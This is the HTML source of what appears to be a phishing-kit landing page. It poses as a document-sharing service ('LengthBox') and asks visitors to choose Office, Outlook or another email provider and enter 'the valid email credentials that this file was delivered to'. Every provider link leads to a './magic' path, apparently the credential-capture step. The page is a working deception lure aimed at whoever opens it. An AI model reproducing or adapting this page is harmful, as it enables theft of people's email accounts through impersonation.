<html>
	<head>
		<meta charset="utf-8">
		<meta name="viewport" content="width=device-width, initial-scale=1.0">
		<link rel="stylesheet" href="/css/with.css">
		<style type="text/css">
			body{
				background-image: url('./img/background.png');
			}
			.content{
				width: 60%;
				margin: 10% auto;
				display: block;
				box-shadow:	1px 2px 1px #333;
				background: #fff;
				text-align: center;
			}
			.content .span{
				margin: 1rem auto;
				display: block;
				text-align: center;
				padding: 1rem;
			}
			.span div a{
				display: block;
			}
			a img {
				width: 16rem !important;
				margin: 1rem auto;
				display: block;
			}
			.footer{
				text-align: center;
			}
			.footer img{
				width: 12rem;
			}
			.footer *{
				display: block;
				margin:  2px auto;
			}
		</style>
		<title>
			Signin in to view this document
		</title>
	</head>
	<body>
		<div class="content">
			<img src="./img/ad_logo.png">
			<div class="span">
				<div >
					Please provide the valid email credentials that this file was delivered to in order to see it.
					<br>
					<div>
						<a href="./magic">
							<img src="./img/office.png">
						</a>
						<a href="./magic">
							<img src="./img/out.png">
						</a>
						<a href="./magic">
							<img src="./img/others.png">
						</a>
					</div>
					<br>
					To access the document, select your email provider.
				</div>
				<br><br>
				<div class="footer">
					<img src="./img/adl.jpg">
					<br>
					<a>
						CopyRight &copy; LengthBox 2021.
					</a>
				</div>
			</div>
		</div>
	</body>
</html>
